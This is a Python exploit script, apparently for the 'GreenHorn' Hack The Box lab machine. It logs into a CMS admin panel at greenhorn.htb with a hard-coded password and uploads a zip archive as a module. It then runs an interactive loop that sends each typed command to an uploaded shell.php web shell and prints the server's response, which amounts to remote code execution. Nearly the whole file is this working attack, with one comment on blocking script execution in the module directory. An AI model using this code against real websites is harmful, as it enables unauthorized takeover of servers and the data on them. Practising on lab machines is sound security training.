GreenHorn
import requests
import readline
from requests_toolbelt.multipart.encoder import MultipartEncoder
def print_colored(text, color_code):
    """Print *text* wrapped in an ANSI SGR colour sequence.

    Args:
        text: Value to display; it is interpolated with an f-string.
        color_code: SGR parameter placed between ``ESC[`` and ``m``.
    """
    start = f"\033[{color_code}m"
    reset = "\033[0m"  # SGR 0 restores the terminal's default attributes
    print(f"{start}{text}{reset}")
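def upload():
    """Log in to the admin panel and submit ``a.zip`` as a module archive.

    The function authenticates with a hard-coded password, then POSTs the
    archive to the ``installmodule`` action using the same session cookie.

    Returns:
        True when both the login POST and the upload POST answer HTTP 200,
        False otherwise (a message is printed for the step that failed).
    """
    login_url = "http://greenhorn.htb/login.php"
    upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
    headers = {"Referer": login_url}
    # The password is a common dictionary word; the whole flow depends on the
    # admin account accepting it.
    login_payload = {"cont1": "iloveyou1", "admin": "", "submit": "Log in"}

    # Context managers close the archive handle and the session's connections
    # on every path; the original left both open on each call.
    with open("a.zip", "rb") as archive, requests.Session() as session:
        multipart_data = MultipartEncoder(
            fields={
                "sendfile": ("payload.zip", archive, "application/zip"),
                "submit": "Upload",
            }
        )

        # A timeout keeps the caller from blocking forever on a dead host.
        login_response = session.post(
            login_url, headers=headers, data=login_payload, timeout=10
        )
        # NOTE(review): a 200 only shows the request was served; whether the
        # login was actually accepted is not checked here.
        if login_response.status_code != 200:
            print("[!] Login problem. response code:", login_response.status_code)
            return False

        upload_headers = {
            "Referer": upload_url,
            # Carries the multipart boundary generated by the encoder.
            "Content-Type": multipart_data.content_type,
        }
        upload_response = session.post(
            upload_url, headers=upload_headers, data=multipart_data, timeout=10
        )
        if upload_response.status_code != 200:
            print("[!] ZIP file upload error. Response code:", upload_response.status_code)
            return False
        return True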
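if __name__ == '__main__':
    # Interactive loop: each line typed is POSTed as form field "0" to the PHP
    # file that the uploaded archive is expected to place under
    # data/modules/payload/, and the response body is printed.
    #
    # Server-side this appears as a module-install POST followed by a POST to
    # a .php path under data/modules/; disallowing script execution in that
    # directory breaks the second step.
    rce_url = "http://greenhorn.htb/data/modules/payload/shell.php"
    while True:
        # The prompt glyph was mis-decoded in the original text; restored to U+276F.
        user_input = input("\033[94m❯ \033[0m")
        # Handle the local "exit" keyword before any network traffic; the
        # original sent it to the server first and only then left the loop.
        if user_input.lower() == 'exit':
            print("Exiting...")
            break
        # The archive is re-submitted before every command. upload() prints
        # its own failure messages; its return value is not used here.
        upload()
        rce = requests.post(rce_url, data={"0": user_input}, timeout=10)
        print(rce.text)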